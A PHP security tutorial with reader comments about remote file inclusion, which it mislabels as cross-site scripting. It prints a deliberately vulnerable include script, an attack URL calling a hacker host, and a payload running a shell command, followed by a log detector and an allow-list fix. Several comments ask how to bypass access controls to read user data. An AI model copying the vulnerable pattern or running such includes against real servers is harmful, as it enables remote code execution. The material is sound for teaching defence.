Writing Secure PHP Applications
By Erik Wrenholt
PHP is a powerful scripting language for building web applications, and also one of the easiest ways for hackers to gain access to your web server. Developers need to understand how their scripts can be exploited in order to protect them.
One of the more popular attacks is the Cross-Site-Scripting technique. A hacker can exploit a poorly written PHP application by executing their PHP code on your web server.
The easiest way to demonstrate this vulnerability is to experiment with a PHP script that has this problem. Place this script in your web server's document root. Don't forget to remove it when you are done with it!
hackme.php source

    <a href="?page=home.php">Home</a> |
    <a href="?page=about.php">About</a>
    <?php
    // Deliberately vulnerable: whatever the visitor puts in ?page= is handed
    // straight to include, so a remote URL can be loaded and executed here.
    $page = $_GET['page'];
    if ($page)
        include $page;
    else
        echo "Please specify a page.";
    ?>
The programmer can simply add links to new PHP pages in the HTML as they add pages to the website:
| <a href="?page=contact.php">Contact</a>
But an attacker can modify the URL and do the same thing!
http://www.site.com/hackme.php?page=http://www.hacker.com/evilscript.php
The hackme.php script will happily load evilscript.php from the www.hacker.com web server and execute it on your machine. You can try this example by placing evilscript.php in the same directory as hackme.php and passing its URL to the hackme.php script:
http://127.0.0.1/hackme.php?page=http://127.0.0.1/evilscript.php
evilscript.php source

    <?php
    // Runs a shell command on whichever server included this file.
    system ('uname -a');
    ?>
This example will execute the uname command on your computer, giving the attacker information about what operating system you are running. They can then modify their evilscript.php to download a local root exploit specific to your operating system, and gain full access to your web server.
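Requests like the one above leave a distinctive trace in the web server's access log: a page parameter that carries a URL scheme instead of a plain filename. The following script is an added example, not part of the original article; it scans Apache-style log lines for that pattern, including the percent-encoded form and the .txt variant mentioned in the comments. The log lines are constructed for the example, and the hackme.php path is taken from the article.

```php
<?php
// Added example, not part of the original article: scan Apache-style access
// log lines for hackme.php requests whose page parameter is a URL rather
// than a plain local filename. That is the shape of the remote-include
// request shown in the article. The log lines are constructed for this example.

$sample_log = <<<'LOG'
10.0.0.5 - - [30/Aug/2004:10:01:12 -0700] "GET /hackme.php?page=about.php HTTP/1.1" 200 512
10.0.0.9 - - [30/Aug/2004:10:02:33 -0700] "GET /hackme.php?page=http://www.hacker.com/evilscript.php HTTP/1.1" 200 1024
10.0.0.9 - - [30/Aug/2004:10:03:01 -0700] "GET /hackme.php?page=http%3A%2F%2Fwww.hacker.com%2Fevilscript.txt HTTP/1.1" 200 1024
10.0.0.5 - - [30/Aug/2004:10:05:40 -0700] "GET /hackme.php?page=home.php HTTP/1.1" 200 480
LOG;

/**
 * True if a page parameter carries a URL scheme (http://, ftp://, ...), which
 * a legitimate link on this site never does. The value is decoded once more
 * so a percent-encoded scheme does not slip past the check.
 */
function page_param_is_remote(string $value): bool
{
    $decoded = rawurldecode($value);
    return preg_match('#^[a-z][a-z0-9+.-]*://#i', $decoded) === 1;
}

/**
 * Parse each log line, extract the page query parameter and return one
 * [client_ip, timestamp, page_value] row per remote-include attempt.
 */
function find_remote_include_attempts(string $log): array
{
    $hits = [];
    foreach (explode("\n", trim($log)) as $line) {
        // client ip, two dashes, [timestamp], "METHOD /path?query HTTP/x.y"
        if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "[A-Z]+ (\S+) HTTP\/[\d.]+"/', $line, $m)) {
            continue;
        }
        $parts = explode('?', $m[3], 2);
        if (count($parts) < 2) {
            continue;                       // no query string at all
        }
        parse_str($parts[1], $params);      // parse_str also percent-decodes values
        if (!isset($params['page']) || !is_string($params['page'])) {
            continue;
        }
        if (page_param_is_remote($params['page'])) {
            $hits[] = [$m[1], $m[2], $params['page']];
        }
    }
    return $hits;
}

foreach (find_remote_include_attempts($sample_log) as [$ip, $when, $value]) {
    printf("%s  %s  page=%s\n", $ip, $when, $value);
}
```

Run against the constructed log, only the two requests from 10.0.0.9 are reported; the ordinary home.php and about.php requests pass. Point $sample_log at a real access log (or read it line by line) and the same two functions work unchanged.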
Fixing the hackme.php script
Basically, you want to remove the line that says 'include $page;', because it lets the attacker load a page from anywhere on the internet. Instead, include PHP scripts only if they are explicitly listed in a switch statement: the request value is compared against known names and is never used as a path itself.
    <a href="?page=home.php">Home</a> |
    <a href="?page=about.php">About</a>
    <?php
    // Only the file names listed below are ever included. Anything else,
    // including a URL, falls through to the default branch.
    $page = $_GET['page'];
    switch ($page) {
        case "":
        case "home.php":
            include "home.php";
            break;
        case "about.php":
            include "about.php";
            break;
        default:
            echo "Invalid page";
            break;
    }
    ?>
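The switch above is the right idea, and it generalizes to an allow-list that grows with the site without editing control flow. The following is an added example, not the article's own code: page names map to files under a fixed directory, the resolved path is checked against that directory before include, and rejected requests are logged instead of echoed. The page names, the pages/ directory and the log destination are assumptions made for the example.

```php
<a href="?page=home">Home</a> |
<a href="?page=about">About</a> |
<a href="?page=contact">Contact</a>
<?php
// Added example, not the article's own code: the switch fix generalized to
// an allow-list map with a filesystem check. The page names, the pages/
// directory and the log destination are assumptions for this example.

$pages_dir = __DIR__ . '/pages';   // assumed directory holding the page fragments

// The request value is only ever a key into this map; it is never used as
// a path itself, so a URL or any other string simply misses the lookup.
$allowed_pages = [
    ''        => 'home.php',
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Map a request value to an absolute file path inside $dir, or return null.
 * The realpath() prefix check is belt-and-braces: it catches an allow-list
 * entry that was misconfigured to point outside the pages directory.
 */
function resolve_page(string $requested, array $allowed, string $dir): ?string
{
    if (!array_key_exists($requested, $allowed)) {
        return null;
    }
    $base = realpath($dir);
    $file = realpath($dir . DIRECTORY_SEPARATOR . $allowed[$requested]);
    if ($base === false || $file === false) {
        return null;                 // directory or file does not exist
    }
    if (strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;                 // resolved outside the pages directory
    }
    return $file;
}

// Accept only a scalar string; page[]=x would arrive as an array.
$requested = (isset($_GET['page']) && is_string($_GET['page'])) ? $_GET['page'] : '';
$file = resolve_page($requested, $allowed_pages, $pages_dir);

if ($file === null) {
    // Record the rejected value for review. var_export() keeps it on one
    // line and quoted; the value is never echoed back to the browser.
    error_log('page request rejected: ' . var_export($requested, true));
    http_response_code(404);
    echo 'Invalid page';
} else {
    include $file;
}
```

Two points on the design. First, the map means the string from the browser is compared for equality, not interpreted, so there is nothing for a crafted value to do except miss. Second, as defense in depth, set allow_url_include = Off in php.ini (and allow_url_fopen = Off if nothing on the server needs remote streams); that makes include refuse URLs outright, but it is a safety net, not a substitute for the allow-list.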
Comments
More PHP Security Info
08/30/04
Jon: There's some good stuff at SecurePHP on writing secure code. It goes into a bit more depth.
Worse
08/31/04
Stathy Touloumis: This doesn't seem like an issue with insecure PHP "code" but rather PHP in general. Why the hell would PHP allow included code from a remote server without any type of security check?
Also, the sample above shouldn't work, because the remote PHP code should be parsed on the hacker's server before sending the page to be included, thereby executing the system call on the hacker's system. Of course the hacker could explicitly allow the source to be sent.
If PHP implicitly bypasses the parsing of the page from the hacker's server somehow (when an include is done) then this is another strike against PHP, as this exploit could be easily used to retrieve source for any site running PHP.
Again, I'm not the expert on PHP, but just a few points that I thought of while reading this article.
re: Worse
09/04/04
Erik Wrenholt (erik -at- timestretch.com): The example scenario would be more realistic if you renamed the evilscript.php to evilscript.txt. It would work just the same.
Remote Include
11/23/04
ALcard (alcard2020 -at- hotmail.com):

    $lines = file("http://www.whatever-site.com/directory/users.dat");
    for ($i = 0; $i < count($lines); $i++) {
        print "<p><b>";
        echo $lines[$i];
        print "</b><p>------------------------------------------------------------<p>";
    }

All logic speaking to me, this should print out the contents of the .dat page in my browser window. Since this is not a PHP file, it won't be parsed. The problem is, /directory has a .htaccess file that reads
"bla-bla
With Apache, the user will get 'internal server error' in most cases (depending on your Apache settings).
So, nobody can see user info (like passwords, mails, etc.)."
So how would one go about bypassing this little obstacle?
file extension
03/03/05
It doesn't matter what the file extension is on the hacker.com server. If the server isn't set up to parse PHP, then the source will be sent over. For example, a hacker could host their evil PHP file at geocities.com because they don't parse PHP files.
Reply to Topic
08/30/07
Ahsan Riaz (me -at- you.com): Try to be more specific and try to address practical problems instead of mentioning theories.